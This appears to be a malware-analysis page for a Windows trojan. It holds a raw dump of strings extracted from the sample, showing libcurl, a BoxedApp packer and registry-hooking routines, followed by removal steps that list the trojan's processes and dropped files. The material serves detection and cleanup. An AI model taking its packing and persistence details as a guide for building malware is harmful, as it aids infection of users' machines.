_Curl_retry_request
_Curl_fillreadbuffer
_Curl_readwrite
_curl_strnequal
_curl_strequal
_Curl_easy_addmulti
_curl_easy_send
_curl_easy_recv
_curl_easy_pause
_Curl_easy_initHandleData
_curl_easy_reset
_curl_easy_duphandle
_curl_easy_getinfo
_curl_easy_cleanup
_curl_easy_perform
_curl_easy_setopt
_curl_global_cleanup
_curl_global_init
_curl_easy_init
_curl_global_init_mem
_Curl_fnmatch
_Curl_fileinfo_dtor
_Curl_fileinfo_alloc
_Curl_wildcard_dtor
_Curl_wildcard_init
_Curl_httpchunk_init
_Curl_httpchunk_read
_Curl_strtok_r
_Curl_persistconninfo
_Curl_socket
_Curl_closesocket
_Curl_getconnectinfo
_Curl_timeleft
_Curl_sndbufset
_Curl_connecthost
_Curl_updateconninfo
_Curl_is_connected
_Curl_llist_alloc
_Curl_llist_insert_next
_Curl_llist_remove
_Curl_llist_destroy
_Curl_llist_count
_Curl_llist_move
_Curl_hash_pick
_Curl_hash_str
_Curl_hash_start_iterate
_Curl_hash_next_element
_Curl_str_key_compare
_Curl_hash_clean_with_criterium
_Curl_hash_delete
_Curl_hash_clean
_Curl_hash_destroy
_Curl_hash_add
_Curl_hash_init
_Curl_hash_alloc
_fd_key_compare
_multi_freeamsg
_Curl_multi_pipeline_enabled
_Curl_multi_handlePipeBreak
_Curl_multi_set_easy_connection
_Curl_multi_max_host_connections
_Curl_multi_max_total_connections
_Curl_multi_max_pipeline_length
_Curl_multi_content_length_penalty_size
_Curl_multi_chunk_length_penalty_size
_Curl_multi_pipelining_site_bl
_Curl_multi_pipelining_server_bl
_curl_multi_assign
_Curl_expire
_Curl_multi_process_pending_handles
_curl_multi_timeout
_curl_multi_fdset
_curl_multi_setopt
_curl_multi_info_read
_curl_multi_cleanup
_curl_multi_perform
_curl_multi_socket_all
_curl_multi_socket_action
_curl_multi_socket
_curl_multi_wait
_curl_multi_remove_handle
_curl_multi_add_handle
_curl_multi_init
_Curl_unencode_cleanup
_Curl_unencode_gzip_write
_Curl_unencode_deflate_write
_curl_share_init
_Curl_share_lock
_Curl_share_unlock
_curl_share_cleanup
_curl_share_setopt
_Curl_digest_cleanup
_Curl_output_digest
_Curl_input_digest
_Curl_MD5_init
_Curl_MD5_update
_Curl_MD5_final
_Curl_md5it
_Curl_rand
_Curl_srand
_Curl_inet_pton
_curl_easy_strerror
_curl_multi_strerror
_curl_share_strerror
_Curl_strerror
_Curl_ipvalid
_Curl_ipv4_resolve_r
_Curl_getaddrinfo
_Curl_set_dns_servers
_Curl_inet_ntop
_Curl_gmtime
_curl_getdate
_Curl_wait_ms
_Curl_poll
_Curl_socket_check
_Curl_clone_ssl_config
_Curl_free_ssl_config
_Curl_ssl_config_matches
_Curl_splay
_Curl_splayinsert
_KEY_NOTUSED.17658
_Curl_splaygetbest
_Curl_splayremovebyaddr
_Curl_blockread_all
_Curl_SOCKS5
_Curl_SOCKS4
_Curl_raw_toupper
_Curl_raw_equal
_Curl_raw_nequal
_Curl_strntoupper
_Curl_freeaddrinfo
_Curl_he2ai
_Curl_ip2addr
_Curl_str2addr
_curl_slist_append
_curl_slist_free_all
_Curl_slist_duplicate
_curlx_nonblock
_Curl_memrchr
_curlx_ultous
_curlx_ultouc
_curlx_ultosi
_curlx_uztosi
_curlx_uztoul
_curlx_uztoui
_curlx_sltosi
_curlx_sltoui
_curlx_sltous
_curlx_uztosz
_curlx_sotouz
_curlx_sztosi
_curlx_sitouz
_curlx_sktosi
_curlx_sitosk
_Curl_HMAC_init
_Curl_HMAC_update
_Curl_HMAC_final
_Curl_gethostname
http_negotiate_sspi.c
_Curl_proxyCONNECT
_Curl_proxy_connect
_Curl_sasl_cleanup
_Curl_sasl_create_login_message
_sasl_digest_get_key_value
_Curl_sasl_create_digest_md5_message
_Curl_sasl_create_cram_md5_message
_Curl_sasl_create_plain_message
_Curl_bundle_remove_conn
_Curl_bundle_add_conn
_Curl_bundle_destroy
_Curl_bundle_create
_Curl_conncache_find_first_connection
_Curl_conncache_foreach
_Curl_conncache_remove_conn
_Curl_conncache_find_bundle
_Curl_conncache_add_conn
_Curl_conncache_destroy
_Curl_conncache_init
_print_pipeline
_Curl_pipeline_set_server_blacklist
_Curl_pipeline_server_blacklisted
_Curl_pipeline_set_site_blacklist
_Curl_pipeline_site_blacklisted
_Curl_move_handle_from_send_to_recv_pipe
_Curl_add_handle_to_pipeline
_Curl_pipeline_penalized
.weak.__Jv_RegisterClasses.___gcc_register_frame
__libmsvcrt_a_iname
_Curl_handler_http
___crt_xl_start__
___crt_xi_start__
___crt_xi_end__
_Curl_crealloc
_Curl_cfree
_Curl_HMAC_MD5
_Curl_wkday
___crt_xp_start__
_Curl_handler_file
___crt_xp_end__
__head_libmsvcrt_a
_Curl_ccalloc
___crt_xc_end__
___crt_xc_start__
_Curl_DIGEST_MD5
_Curl_cmalloc
_Curl_month
_Curl_cstrdup
___crt_xt_start__
_Curl_cwcsdup
___crt_xt_end__
_Curl_ack_eintr
0`.data
0@.bss
libgcc_s_dw2-1.dll
\QUSEREX.DLL
pthread_key_create
pthread_key_delete
_CRT_MT
___w64_mingwthr_add_key_dtor
___w64_mingwthr_remove_key_dtor
__mingwthr_key_t
__mingwthr_key
GNU C 4.5.2
../mingw/dllcrt1.c
C:\MinGW\msys\1.0\src\mingwrt
-DllMainCRTStartup@12
__report_error
../mingw/crtst.c
__mingwthr_run_key_dtors
keyp
new_key
prev_key
cur_key
key_dtor_list
c:/mingw/bin/../lib/gcc/mingw32/4.5.2/include
crtst.c
cygming-crtbegin.c
.tls$AAA
.tls$ZZZ
.CRT$XLA
.CRT$XLZ
.CRT$XLC
.CRT$XLD
.CRT$XDA
.CRT$XDZ
cygming-crtend.c
__CRT_MT
.eh_frame
.debug_pubtypes
.debug_str
.debug_ranges
_pthread_key_create
_pthread_key_delete
_ptw32_processTerminate.part.1
_pthread_join
___report_error
___mingwthr_run_key_dtors
_key_dtor_list
____w64_mingwthr_add_key_dtor
____w64_mingwthr_remove_key_dtor
.text.startup
.ctors.65535
.weak.___register_frame_info.___gcc_register_frame
_ptw32_selfThreadKey
_ptw32_cleanupKey
.weak.___deregister_frame_info.___gcc_register_frame
deflate 1.2.8 Copyright 1995-2013 Jean-loup Gailly and Mark Adler
inflate 1.2.8 Copyright 1995-2013 Mark Adler
This EXE is created by the demo version of BoxedApp Packer
Visit our web-site at: http://boxedapp.com/boxedapppacker/order.html
WBoxedAppLog_%d.txt
BoxedAppVar:ExeFileName
BoxedAppVar:ExeFileExtension
BoxedAppVar:ExeFileNameWithoutExtension
BoxedAppVar:ExeFullPath
BoxedAppVar:OldCmdLine
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_CURRENT_CONFIG
HKEY_USERS
%s\%s
%s\winsxs\tempBxDir\virtualAsm
:\tempManifest.manifest
%s_%.8x_%.8x_%.8x
\KernelBase.dll
\.NETFramework\assembly\GAC\BoxedAppSDK_AppDomainManager\1.0.0.0__ef07ce3257ee81c1\BoxedAppSDK_AppDomainManager.dll
\assembly\GAC\BoxedAppSDK_AppDomainManager\1.0.0.0__ef07ce3257ee81c1\BoxedAppSDK_AppDomainManager.dll
%d-%d-%p
:\TLSSupport310D39B571B74d36B95451DD240D8758
",BoxedAppSDK_TryCreateProcessForVirtualEXE_AnotherBitnessPartHelper
\rundll32.exe"
DotNetAppDomainManager.CManagedHost
BoxedAppSDK_AppDomainManager, Version=1.0.0.0, Culture=neutral, PublicKeyToken=ef07ce3257ee81c1
DotNetAppDomainManager.CAppDomainManager
.config
.manifest
",BoxedAppSDK_AttachMixedBitnessProcessHelper
Attempt to launch not executable file:
Unable to find appropriate template exe
comdlg32.dll
\dllhost.exe
hh.exe
find.exe
help.exe
winver.exe
regsvr32.exe
dllhost.exe
ntvdm.exe
tcpsvcs.exe
mpr.dll
Wadvapi32.dll
sxs.dll
Obtain a full version, purchase a license at http://boxedapp.com/boxedappsdk/order.html
%s_%.8x_%.8x
%s_%.8x
boxedapp_msg_process
boxedapp_event_newmsg
boxedapp_msg_global
bxsdk64.dll
:\{9019ACD6-BC11-4308-8C49-92E0601DF38D}\temp\
\DosDevices\pipe\
\Device\NamedPipe\
\??\pipe\
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Print
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Ports
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Perflib
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkCards
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Gre_Initialize
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Fonts
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontMapper
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontLink
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontDpi
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Console
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Telephony\Locations
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\PreviewHandlers
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\KindMap
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\DriveIcons
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\AutoplayHandlers
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Control Panel\Cursors\Schemes
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths
\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates
\REGISTRY\MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates
publicKeyToken
Software\Microsoft\Windows\CurrentVersion\SideBySide\Winners\
3, 3, 5, 0
BoxedApp, BoxedApp SDK, BoxedApp Packer, BoxedApp.com and some others are trademarks (some of them are registered) of Virtualization Technologies Ltd.
BoxedAppSDK.dll
\libcurl-4.dll
pthreadgc2.dll
\pthreadgc2.dll
POSIX Threads for Windows LPGL
2, 9, 1, 0
pthreadGC2.DLL
http://sourceware.org/pthreads-win32/
\zlib1.dll
For more information visit http://www.zlib.net/

cvtres.exe_3500_rwx_00B20000_000AE000:

.text
`.rdata
@.data
.rsrc
@.reloc
TryCreateProcessForVirtualEXE, template exe found:
CBoxedAppCore::My_NtDeleteKey, KeyHandle = 0x
CBoxedAppCore::My_NtEnumerateValueKey, KeyHandle = 0x
CBoxedAppCore::My_NtFlushKey, KeyHandle = 0x
CBoxedAppCore::My_NtNotifyChangeKey, KeyHandle = 0x
CBoxedAppCore::My_NtQueryKey, KeyHandle =
CBoxedAppCore::My_NtQueryMultipleValueKey, KeyHandle =
CBoxedAppCore::My_NtSetInformationKey, KeyHandle = 0x
KernelBase.dll
kernel32.dll
0x%x%x
CBoxedAppCore::My_NtCreateKey, ObjectAttributes = '
CBoxedAppCore::My_NtDeleteValueKey, KeyHandle = 0x
C62E2B35-E4B3-4019-A7C4-F50AC7F78470
CBoxedAppCore::My_NtLoadKey, DestinationKeyName = '
CBoxedAppCore::My_NtQueryValueKey, KeyHandle = 0x
CBoxedAppCore::My_NtReplaceKey, BackupHiveFileName = '
CBoxedAppCore::My_NtSetValueKey, KeyHandle = 0x
CBoxedAppCore::My_NtUnloadKey, DestinationKeyName = '
CBoxedAppCore::My_NtRenameKey, KeyHandle =
BoxedAppSDK::CBoxedAppCore::TryCreateProcessForVirtualEXE_AnotherBitnessPart
: Can't create process of rundll32.exe, last error =
BoxedAppSDK_TryCreateProcessForVirtualEXE_AnotherBitnessPartHelper
BoxedAppSDK_AttachMixedBitnessProcessHelper
BoxedAppSDK_EnumVirtualRegKeysA
BoxedAppSDK_EnumVirtualRegKeysW
BoxedAppSDK_ExecuteDotNetApplicationA
BoxedAppSDK_ExecuteDotNetApplicationW
BoxedAppSDK_DeleteVirtualRegKeyByHandle
BoxedAppSDK_DeleteVirtualRegKeyW
BoxedAppSDK_DeleteVirtualRegKeyA
BoxedAppSDK_CreateVirtualRegKeyW
BoxedAppSDK_CreateVirtualRegKeyA
{4F95F74C-9713-4181-ACDD-8A50195FBC0F}
BoxedAppSDK::CBoxedAppCore::AttachToProcess_WithProcessHelper
BoxedAppSDK::CBoxedAppCore::AttachMixedBitnessProcessHelper
CBoxedAppCore::My_NtLoadKey2, DestinationKeyName = '
CBoxedAppCore::My_NtRestoreKey, KeyHandle = 0x
CBoxedAppCore::My_NtSaveKey, KeyHandle = 0x
:\VirtualDllWithSameImport.dll
:\VirtualDllWithTls.dll
VirtualDllWithTls.dll
VirtualDllWithSameImport.dll
ole32.dll
WinExec
advapi32.dll
NtRenameKey
NtUnloadKey
NtSetValueKey
NtSetInformationKey
NtSaveKey
NtRestoreKey
NtReplaceKey
NtQueryValueKey
NtQueryMultipleValueKey
NtQueryKey
NtOpenKeyEx
NtOpenKey
NtNotifyChangeKey
NtLoadKey2
NtLoadKey
NtFlushKey
NtEnumerateValueKey
NtEnumerateKey
NtDeleteValueKey
NtDeleteKey
NtCreateKey
ntdll.dll
[BOXEDAPP][pid:%d][tid:%d][ %.2d:%.2d:%.2d.%.3d]
FILE_EXECUTE
GENERIC_EXECUTE
KEY_WOW64_64KEY
KEY_WOW64_32KEY
KEY_NOTIFY
KEY_CREATE_LINK
KEY_ENUMERATE_SUB_KEYS
KEY_CREATE_SUB_KEY
KEY_SET_VALUE
KEY_QUERY_VALUE
SECTION_MAP_EXECUTE
PAGE_EXECUTE_WRITECOPY
PAGE_EXECUTE_READWRITE
PAGE_EXECUTE_READ
PAGE_EXECUTE
STATUS_PRIMARY_TRANSPORT_CONNECT_FAILED
STATUS_LOCAL_USER_SESSION_KEY
STATUS_NULL_LM_PASSWORD
STATUS_IMAGE_MACHINE_TYPE_MISMATCH_EXE
STATUS_CARDBUS_NOT_SUPPORTED
STATUS_INVALID_PORT_ATTRIBUTES
STATUS_PORT_MESSAGE_TOO_LONG
STATUS_PORT_DISCONNECTED
STATUS_PORT_CONNECTION_REFUSED
STATUS_INVALID_PORT_HANDLE
STATUS_PORT_ALREADY_SET
STATUS_EAS_NOT_SUPPORTED
STATUS_CTL_FILE_NOT_SUPPORTED
STATUS_WRONG_PASSWORD
STATUS_ILL_FORMED_PASSWORD
STATUS_PASSWORD_RESTRICTION
STATUS_PASSWORD_EXPIRED
STATUS_FLOAT_DENORMAL_OPERAND
STATUS_FLOAT_INVALID_OPERATION
STATUS_PIPE_NOT_AVAILABLE
STATUS_INVALID_PIPE_STATE
STATUS_PIPE_BUSY
STATUS_PIPE_DISCONNECTED
STATUS_PIPE_CLOSING
STATUS_PIPE_CONNECTED
STATUS_PIPE_LISTENING
STATUS_NOT_SUPPORTED
STATUS_PIPE_EMPTY
STATUS_WRONG_PASSWORD_CORE
STATUS_PIPE_BROKEN
STATUS_DISK_OPERATION_FAILED
STATUS_KEY_DELETED
STATUS_KEY_HAS_CHILDREN
STATUS_NO_USER_SESSION_KEY
STATUS_PASSWORD_MUST_CHANGE
STATUS_PORT_UNREACHABLE
STATUS_LOGIN_TIME_RESTRICTION
STATUS_LOGIN_WKSTA_RESTRICTION
STATUS_UNSUPPORTED_COMPRESSION
STATUS_NO_USER_KEYS
STATUS_NOT_EXPORT_FORMAT
STATUS_TRANSPORT_FULL
STATUS_WMI_NOT_SUPPORTED
STATUS_SAM_NEED_BOOTKEY_PASSWORD
STATUS_SAM_NEED_BOOTKEY_FLOPPY
STATUS_STRONG_CRYPTO_NOT_SUPPORTED
STATUS_NOT_SUPPORTED_ON_SBS
STATUS_CSS_KEY_NOT_PRESENT
STATUS_CSS_KEY_NOT_ESTABLISHED
STATUS_NO_KERB_KEY
STATUS_UNSUPPORTED_PREAUTH
STATUS_PORT_NOT_SET
STATUS_INVALID_IMPORT_OF_NON_DLL
STATUS_SMARTCARD_NO_KEY_CONTAINER
STATUS_SMARTCARD_NO_CERTIFICATE
STATUS_SMARTCARD_NO_KEYSET
STATUS_SMARTCARD_CERT_REVOKED
STATUS_SMARTCARD_CERT_EXPIRED
STATUS_SXS_KEY_NOT_FOUND
STATUS_CLUSTER_JOIN_IN_PROGRESS
STATUS_CLUSTER_JOIN_NOT_IN_PROGRESS
RegDeleteKeyExW
NtRequestWaitReplyPort
NtConnectPort
NtReplyPort
NtCompleteConnectPort
NtAcceptConnectPort
NtReplyWaitReceivePort
NtCreateWaitablePort
Imported function,
.data
.idata
It's impossible to create virtual file: parent file is virtual, but passed pBehavior is not NULL
It's impossible to create virtual file: passed pBehavior doesn't support Behavior::IVirtualFileStream
It's impossible to create virtual file: parent node is virtual, but passed pBehavior is not NULL
BoxedAppSDK::Registry::Impl::CRegistry::GetAllChildsKeys
NtEnumerateKey() returned unexpected error, status =
, RegTree::IEnumKeyNode::GetNext() failed, hr =
BoxedAppSDK::Registry::Impl::CRegistry::EnumVirtualRegKeys
, RegTree::IKeyNode::EnumKeys() failed, hr =
: RegTree::IEnumKeyNode::GetNext() failed, hr =
: GetAllChildsKeys() failed, status =
BoxedAppSDK::Registry::Impl::CRegistry::NtQueryKeyInternal
: RegTree::IKeyNode::EnumKeys() failed, hr =
BoxedAppSDK::Registry::Impl::CRegistry::GetFullRegKeyPath
error, IVirtualKeyHandle_GetFullPath() returned
Invalid key information class:
KeySetHandleTagsInformation is not supported for virtual handle
KeySetDebugInformation is not supported for virtual handle
KeySetVirtualizationInformation is not supported for virtual handle
KeyControlFlagsInformation is not supported for virtual handle
KeyWow64FlagsInformation is not supported for virtual handle
We still don't process NtQueryObject / ObjectBasicInformation for virtual key handles
We still don't process NtQueryObject / ObjectTypeInformation for virtual key handles
: IVirtualKeyHandle::Rename() failed, hr =
: RegTree::IKeyNode::Remove() failed, hr =
BoxedAppSDK::Registry::Impl::CRegistry::NtRenameKeyInternal
: RegTree::IKeyNode::AddKey() failed, hr =
: result hkey =
: IVirtualKey::CreateKey() failed, hr =
: we can't create a virtual key with its own behavior under another virtual key
: Handles::CreateVirtualKeyHandle() failed, hr =
: IVirtualKey::OpenKey() failed, hr =
: RegImpl::CreateKeyOnSharedMem() failed, hr =
: GetFullRegKeyPath() failed for the hKey =
: Handles::IVirtualKeyHandle::CreateKey() failed and returned
: passed pBehavior is not NULL, but parent key is virtual, so we can't create a key
BoxedAppSDK::Registry::Impl::CRegistry::CreateVirtualRegKey
: lpSubKey: "
BoxedAppSDK::Registry::Impl::CRegistry::SearchStartingFromRealKey
: Handles::CreateVirtualKeyHandle() failed
BoxedAppSDK::Registry::Impl::CRegistry::NtCreateKeyInternal
: SearchStartingFromRealKey() failed
: RegTree::IKeyNode::FindValue() failed, hr =
BoxedAppSDK::Registry::Impl::CRegistry::NtDeleteValueKeyInternal
: IVirtualKeyHandle::put_Value() failed, hr =
BoxedAppSDK::Registry::Impl::CRegistry::GetRealKeyLastWriteTime
: NtQueryKey() failed, status =
: NtOpenKey() failed, hr =
BoxedAppSDK::Registry::Impl::CRegistry::HasRealKeySubKeys
: NtEnumerateValueKey() failed when we tried to get name of the node, status =
: IKeyNode::EnumValues() failed, hr =
: Behavior::IVirtualKeyHandle::EnumKeys() failed, hr =
: Behavior::IVirtualKeyHandle::EnumValues() failed, hr =
BoxedAppSDK::Registry::Impl::CRegistry::NtEnumerateValueKeyInternal
BoxedAppSDK::Registry::Impl::CRegistry::NtOpenKeyInternal
: invalid KeyInformationClass passed:
: IVirtualKeyHandle_GetFullPath() failed, hr =
: Behavior::IEnumVirtualKey::GetNext() failed, hr =
: IVirtualKeyHandle::EnumValues() failed, hr =
: IVirtualKeyHandle::EnumKeys() failed, hr =
: IVirtualKeyHandle::get_LastWriteTime() failed, hr =
reg:NtQueryMultipleValueKey(
: IKeyNode::FindValue() failed, hr =
: IVirtualKeyHandle::get_Value() failed, hr =
BoxedAppSDK::Registry::Impl::CRegistry::NtQueryValueKeyInternal
: IVirtualKeyHandle::get_ValueType() failed, hr =
reg:NtSetInformationKey(
RegTree::IKeyNode::RemoveValue() failed, hr
BoxedAppSDK::Registry::Impl::CRegistry::NtSetValueKeyInternal
reg:NtRenameKey(
RegTree::IEnumKeyNode::GetNext(), hr =
RegTree::IKeyNode::EnumKeys(), hr =
: IEnumVirtualKey::GetNext() failed, hr =
BoxedAppSDK::Registry::Impl::CRegistry::NtDeleteKeyInternal
reg:NtDeleteValueKey(
: NtEnumerateKey() failed when we tried to get name of the node, status =
, Behavior::IVirtualKeyHandle::get_Prop() failed, hr =
, Behavior::IVirtualKey::OpenKey() failed, hr =
: IKeyNode::EnumKeys() failed, hr =
BoxedAppSDK::Registry::Impl::CRegistry::NtEnumerateKeyInternal
reg:NtEnumerateValueKey(
reg:NtQueryKey(
reg:NtQueryValueKey(
reg:NtSetValueKey(
reg:NtCreateKey(
reg:NtDeleteKey(
reg:NtEnumerateKey(
reg:NtOpenKey(
GetProcessHeap
GetWindowsDirectoryW
KERNEL32.dll
USER32.dll
RegCloseKey
RegOpenKeyExW
RegDeleteKeyW
RegOpenKeyW
ADVAPI32.dll
OLEAUT32.dll
bxsdk32.dll
d:\build_area\boxedapp_src\src\boxedappsolution\release_full\bxsdk32.pdb
`.rsrc
v2.0.50727
BoxedAppSDK_AppDomainManager.dll
System.Security
.ctor
System.Security.Policy
System.Reflection
System.Runtime.InteropServices
System.Diagnostics
System.Runtime.CompilerServices
System.Collections
System.Security.Permissions
System.IO
DllImportAttribute
shell32.dll
lpCmdLine
1.0.0.0
$87cd9ac9-2a94-4a9b-aee1-8d25d6a19f78
D:\build_area\boxedapp_src\src\BoxedAppSolution\DotNetAppDomainManager\obj\x86\Release_Full\BoxedAppSDK_AppDomainManager.pdb
mscoree.dll
BoxedAppSDKThunk32.dll
d:\build_area\boxedapp_src\src\boxedappsolution\release_full\BoxedAppSDKThunk32.pdb
.reloc
TLSSupport32.dll
d:\build_area\boxedapp_src\src\boxedappsolution\release_full\TLSSupport32.pdb
%s_%.8x_%.8x_%.8x
\KernelBase.dll
\.NETFramework\assembly\GAC\BoxedAppSDK_AppDomainManager\1.0.0.0__ef07ce3257ee81c1\BoxedAppSDK_AppDomainManager.dll
\assembly\GAC\BoxedAppSDK_AppDomainManager\1.0.0.0__ef07ce3257ee81c1\BoxedAppSDK_AppDomainManager.dll
%d-%d-%p
:\TLSSupport310D39B571B74d36B95451DD240D8758
",BoxedAppSDK_TryCreateProcessForVirtualEXE_AnotherBitnessPartHelper
\rundll32.exe"
DotNetAppDomainManager.CManagedHost
BoxedAppSDK_AppDomainManager, Version=1.0.0.0, Culture=neutral, PublicKeyToken=ef07ce3257ee81c1
DotNetAppDomainManager.CAppDomainManager
.config
.manifest
",BoxedAppSDK_AttachMixedBitnessProcessHelper
Attempt to launch not executable file:
Unable to find appropriate template exe
comdlg32.dll
\dllhost.exe
hh.exe
find.exe
help.exe
winver.exe
regsvr32.exe
dllhost.exe
ntvdm.exe
tcpsvcs.exe
mpr.dll
Wadvapi32.dll
sxs.dll
Obtain a full version, purchase a license at http://boxedapp.com/boxedappsdk/order.html
%s_%.8x_%.8x
%s_%.8x
boxedapp_msg_process
boxedapp_event_newmsg
boxedapp_msg_global
bxsdk64.dll
:\{9019ACD6-BC11-4308-8C49-92E0601DF38D}\temp\
\DosDevices\pipe\
\Device\NamedPipe\
\??\pipe\
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Print
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Ports
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Perflib
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkCards
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Gre_Initialize
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Fonts
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontMapper
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontLink
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontDpi
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Console
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Telephony\Locations
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\PreviewHandlers
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\KindMap
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\DriveIcons
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\AutoplayHandlers
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Control Panel\Cursors\Schemes
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths
\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates
\REGISTRY\MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates
publicKeyToken
Software\Microsoft\Windows\CurrentVersion\SideBySide\Winners\
3, 3, 5, 0
BoxedApp, BoxedApp SDK, BoxedApp Packer, BoxedApp.com and some others are trademarks (some of them are registered) of Virtualization Technologies Ltd.
BoxedAppSDK.dll

Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    WScript.exe:2280
    WScript.exe:3524
    wuauclt.exe:304
    cvtres.exe:2696
    cvtres.exe:3396
    vbc.exe:1128
    vbc.exe:2912
    vbc.exe:2688
    vbc.exe:3780
    vbc.exe:672

  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    %WinDir%\SoftwareDistribution\DataStore\Logs\edb.chk (100 bytes)
    %WinDir%\SoftwareDistribution\DataStore\Logs\edb.log (2232 bytes)
    %WinDir%\SoftwareDistribution\DataStore\DataStore.edb (100 bytes)
    %Documents and Settings%\%current user%\Start Menu\Programs\Startup\Update.Microsoft.com.url (46 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\8DFDF057024880D7A081AFBF6D26B92F (533 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Tar2.tmp (2712 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\E8974A4669383843486E5AFDB09650F5 (224 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\E8974A4669383843486E5AFDB09650F5 (2 bytes)
    C:\NTKernel\load32 (7972 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\C554DCF706A5AAB8B360FAD227EAB9C7 (176 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\2BF68F4714092295550497DD56F57004 (408 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\8DFDF057024880D7A081AFBF6D26B92F (176 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Cab1.tmp (54 bytes)
    %Documents and Settings%\%current user%\My Documents\315load32.exe (2105 bytes)
    %Documents and Settings%\All Users\Application Data\load32.exe (2105 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\C554DCF706A5AAB8B360FAD227EAB9C7 (1 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\62B5AF9BE9ADC1085C3C56EC07A82BF6 (224 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\0797C381B2F87EB5A1D5573BD15BA4F4 (240 bytes)
    C:\NTKernel\63462.exe (32324 bytes)
